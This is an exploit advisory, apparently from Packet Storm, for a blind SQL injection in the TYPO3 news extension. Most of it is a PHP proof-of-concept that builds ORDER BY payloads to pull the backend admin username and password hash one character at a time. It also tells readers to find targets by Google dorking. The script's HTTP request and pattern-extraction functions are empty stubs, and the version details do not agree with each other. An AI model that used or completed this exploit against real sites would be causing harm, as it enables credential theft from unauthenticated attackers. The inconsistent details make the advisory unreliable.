TYPO 3.16.0 SQL Injection

🗓️ 05 Mar 2025 00:00:00Reported by indoushkaType
packetstorm🔗 packetstorm.news👁 209 Views
TYPO3 3.16.0 has a SQL injection vulnerability enabling unauthenticated users to execute SQL commands.
=============================================================================================================================================
    | # Title     : TYPO 3.16.0 Code Injection Vulnerability                                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits)                                                            |
    | # Vendor    : https://typo3.org/                                                                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] a SQL Injection vulnerability In TYPO3 NewsController.php 
        in the news module 5.3.2 and earlier. 
        It allows an unauthenticated user to execute arbitrary SQL commands via vectors involving overwriteDemand and OrderByAllowed. 
    	The SQL injection can be used to obtain password hashes for application user accounts. This module has been tested on TYPO3 3.16.0 running news extension 5.0.0.
    
    
    [+] save code as poc.php .
    
    [+] Line 9 : set your target.
    
    [+] USage : cmd => c:\www\test\php poc.php
    
    [+] PayLoad :
    
    <?php
    
    class Typo3NewsModuleSqli {
        private $targetUri;
        private $id;
        private $pattern1;
        private $pattern2;
    
        public function __construct($targetUri = '/', $id = '1', $pattern1 = 'Article #1', $pattern2 = 'Article #2') {
            $this->targetUri = $targetUri;
            $this->id = $id;
            $this->pattern1 = $pattern1;
            $this->pattern2 = $pattern2;
        }
    
        public function run() {
            list($pattern1, $pattern2) = $this->tryAutodetectPatterns();
            
            if (empty($pattern1) || empty($pattern2)) {
                echo "Unable to determine pattern, aborting...\n";
            } else {
                $this->dumpTheHash(['pattern1' => $pattern1, 'pattern2' => $pattern2]);
            }
        }
    
        private function dumpTheHash($patterns) {
            $username = $this->blind('username', 'be_users', 'uid=1', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789', $patterns);
            echo "Username: $username\n";
            $password = $this->blind('password', 'be_users', 'uid=1', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$./', '0123456789', $patterns);
            echo "Password Hash: $password\n";
        }
    
        private function blind($field, $table, $condition, $charset, $digitCharset, $patterns) {
            $offset = 9;
            $size = $this->blindSize("length($field)+$offset", $table, $condition, 2, $digitCharset, $patterns);
            $size = intval($size) - $offset;
            echo "Retrieving field '$field' string ($size bytes)...\n";
            return $this->blindSize($field, $table, $condition, $size, $charset, $patterns);
        }
    
        private function selectPosition($field, $table, $condition, $position, $char) {
            $payload1 = "SELECT $field FROM $table WHERE $condition";
            $payload2 = "ORD(SUBSTRING(($payload1) FROM $position FOR 1))";
            return "uid * (CASE WHEN ($payload2) = " . ord($char) . " THEN 1 ELSE -1 END)";
        }
    
        private function blindSize($field, $table, $condition, $size, $charset, $patterns) {
            $str = '';
            
            for ($position = 0; $position < $size; $position++) {
                foreach (str_split($charset) as $char) {
                    $payload = $this->selectPosition($field, $table, $condition, $position + 1, $char);
                    if ($this->test($payload, $patterns)) {
                        $str .= $char;
                        break;
                    }
                }
            }
            
            return $str;
        }
    
        private function test($payload, $patterns) {
            $res = $this->sendRequest([
                'id' => $this->id,
                'tx_news_pi1[overwriteDemand][OrderByAllowed]' => $payload,
                'tx_news_pi1[overwriteDemand][order]' => $payload
            ]);
    
            if ($res && strpos($res, $patterns['pattern1']) !== false && strpos($res, $patterns['pattern2']) !== false) {
                return strpos($res, $patterns['pattern1']) < strpos($res, $patterns['pattern2']);
            }
    
            return false;
        }
    
        private function tryAutodetectPatterns() {
            echo "Trying to automatically determine Pattern1 and Pattern2...\n";
            
            $res = $this->sendRequest(['id' => $this->id]);
            
            $pattern1 = $this->extractPattern($res, 0);
            $pattern2 = $this->extractPattern($res, 1);
    
            if (empty($pattern1) || empty($pattern2)) {
                echo "Couldn't determine Pattern1 and Pattern2 automatically, switching to user specified values...\n";
                $pattern1 = $this->pattern1;
                $pattern2 = $this->pattern2;
            }
    
            echo "Pattern1: $pattern1, Pattern2: $pattern2\n";
            return [$pattern1, $pattern2];
        }
    
        private function extractPattern($res, $index) {
            // Dummy function for extracting pattern
            return ''; // Replace this with actual extraction logic.
        }
    
        private function sendRequest($params) {
            // Dummy function for sending HTTP requests. Replace with actual request logic.
            return '';
        }
    }
    
    // Example usage
    $typo3Module = new Typo3NewsModuleSqli();
    $typo3Module->run();
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
05 Mar 2025 00:00Current
8.5High risk
Vulners AI Score8.5